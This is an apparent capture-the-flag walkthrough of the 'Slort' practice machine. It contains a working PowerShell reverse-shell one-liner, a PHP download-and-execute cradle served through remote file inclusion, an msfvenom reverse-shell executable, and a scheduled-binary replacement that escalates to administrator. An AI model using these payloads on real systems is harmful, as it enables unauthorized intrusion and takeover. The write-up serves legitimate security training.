Slort

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.182.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 10:43 EST
Nmap scan report for 192.168.182.53
Host is up, received reset ttl 125 (0.11s latency).
Scanned at 2025-11-10 10:43:18 EST for 195s 
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 125
3306/tcp  open  mysql         syn-ack ttl 125 MariaDB 10.3.24 or later (unauthorized)
4443/tcp  open  http          syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.182.53:4443/dashboard/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
5040/tcp  open  unknown       syn-ack ttl 125
8080/tcp  open  http          syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.182.53:8080/dashboard/
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>

We have filezilla ftp running on port 21, smb on port 445, and http on ports 8080, and 4443.

HTTP (8080):

If we visited that port on firefox:

We will be presented with the xampp welcoming page.

Directory Fuzzing:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ gobuster dir -u http://192.168.182.53:8080 -w /usr/share/wordlists/dirb/common.txt -x php,html -t 40
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.182.53:8080
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
<snipped>
/applications.html    (Status: 200) [Size: 3607]
<snipped>
/dashboard            (Status: 301) [Size: 351] [--> http://192.168.182.53:8080/dashboard/]
/favicon.ico          (Status: 200) [Size: 30894]
/examples             (Status: 503) [Size: 1060]
/img                  (Status: 301) [Size: 345] [--> http://192.168.182.53:8080/img/]
/index.php            (Status: 302) [Size: 0] [--> http://192.168.182.53:8080/dashboard/]
/index.php            (Status: 302) [Size: 0] [--> http://192.168.182.53:8080/dashboard/]
/Index.php            (Status: 302) [Size: 0] [--> http://192.168.182.53:8080/dashboard/]
<snipped>
/site                 (Status: 301) [Size: 346] [--> http://192.168.182.53:8080/site/]
<snipped>
Progress: 18452 / 18452 (100.00%)
===============================================================
Finished
===============================================================

Navigate to that directory:

Exploitaion:

Immediately the paramter will catch our attention.

Test it for LFI:

I could not go further with this.

But lets test for RFI as well:

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Slort/www]
└─$ echo 'test' >> test.txt

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Slort/www]
└─$ python3 -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Open that file:

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Slort/www]
└─$ python3 -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.182.53 - - [10/Nov/2025 11:56:21] "GET / HTTP/1.0" 200 -
192.168.182.53 - - [10/Nov/2025 11:56:44] "GET /test.txt HTTP/1.0" 200 -

We have RFI here.

I wrote this simple php script to download and execute powershell script in memory:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ cat shell.ps1 
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.187',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ cat webshell.php 
<?php
$web_cradle = system('powershell -c IEX(IWR -UseBasicParsing -Uri http://192.168.45.187:8000/shell.ps1)');
?>

Start netcat listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ rlwrap nc -nlvp 4443
listening on [any] 4443 ...

Open that webshell.php through our RFI:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ rlwrap nc -nlvp 4443
listening on [any] 4443 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.53] 52425

PS C:\xampp\htdocs\site> whoami
slort\rupert

Here we have a reverse shell.

Post-Exploitation:

After doing some local enumeration, we will find that directory under the C:

PS C:\> dir


    Directory: C:\


Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
d-----         7/20/2020   7:08 AM                Backup                                                                
d-----         12/7/2019   1:14 AM                PerfLogs                                                              
d-r---          5/4/2022   1:06 AM                Program Files                                                         
d-r---         12/3/2021   8:22 AM                Program Files (x86)                                                   
d-r---         12/3/2021   8:29 AM                Users                                                                 
d-----          5/4/2022   1:52 AM                Windows                                                               
d-----         6/12/2020   8:11 AM                xampp                                                                 
-a----        11/10/2025   7:37 AM           2848 output.txt                                                            


PS C:\> cd Backup
PS C:\Backup> dir


    Directory: C:\Backup


Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
-a----         6/12/2020   7:45 AM          11304 backup.txt                                                            
-a----         6/12/2020   7:45 AM             73 info.txt                                                              
-a----         6/23/2020   7:49 PM          73802 TFTP.EXE


PS C:\Backup> cat info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt

So if we can place our executable here instead of TFTP.EXE, we can get reverse shell as the user running this executable.

Test if we can write to that directory:

PS C:\Backup> dir


    Directory: C:\Backup


Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
-a----         6/12/2020   7:45 AM          11304 backup.txt                                                            
-a----         6/12/2020   7:45 AM             73 info.txt                                                              
-a----        11/10/2025   8:26 AM              8 test.txt                                                              
-a----         6/23/2020   7:49 PM          73802 TFTP.EXE                                                              


PS C:\Backup> del test.txt

Yes we can.

Create a reverse shell with msfvenom:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.187 LPORT=4443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: shell.exe

Upload it:

PS C:\Backup> move-item tftp.exe tftp.exe.bak                                                                                                                               
PS C:\Backup> dir                                                                                                                                                           
                                                                                                                                                                            
                                                                                                                                                                            
    Directory: C:\Backup                                                                                                                                                    
                                                                                                                                                                            
                                                                                                                                                                            
Mode                 LastWriteTime         Length Name                                                                                                                      
----                 -------------         ------ ----                                                                                                                      
-a----         6/12/2020   7:45 AM          11304 backup.txt                                                                                                                
-a----         6/12/2020   7:45 AM             73 info.txt                                                                                                                  
-a----         6/23/2020   7:49 PM          73802 tftp.exe.bak                                                                                                              
                                                                                                                                                                            
                                                                                                                                                                            
PS C:\Backup> curl http://192.168.45.187:8000/shell.exe -o TFTP.EXE                                                                                                         
PS C:\Backup> dir                                                                                                                                                           
                                                                                                                                                                            
                                                                                                                                                                            
    Directory: C:\Backup                                                                                                                                                    
                                                                                                                                                                            
                                                                                                                                                                            
Mode                 LastWriteTime         Length Name                                                                                                                      
----                 -------------         ------ ----                                                                                                                      
-a----         6/12/2020   7:45 AM          11304 backup.txt                                                                                                                
-a----         6/12/2020   7:45 AM             73 info.txt                                                                                                                  
-a----        11/10/2025   8:35 AM           7680 TFTP.EXE                                                                                                                  
-a----         6/23/2020   7:49 PM          73802 tftp.exe.bak

Start another netcat listener, and wait up to 5 minutes:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ rlwrap nc -nlvp 4443
listening on [any] 4443 ...

After waiting for like 4 minutes, we got a reverse shell:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ rlwrap nc -nlvp 4443
listening on [any] 4443 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.53] 53122
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
slort\administrator

Get the flags:

C:\WINDOWS\system32>type C:\Users\Administrator\Desktop>\roof.txt
9a44be6d7326dca2de6a836989baabc4
C:\WINDOWS\system32>type C:\Users\rupert\Desktop\ocal.txt
a0e693a29df1aa3f344d200cc3cf4a40

PreviousSquid NextBillyboss

Last updated 2 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagHTTP (8080):

hashtagDirectory Fuzzing:

hashtagExploitaion:

hashtagPost-Exploitation: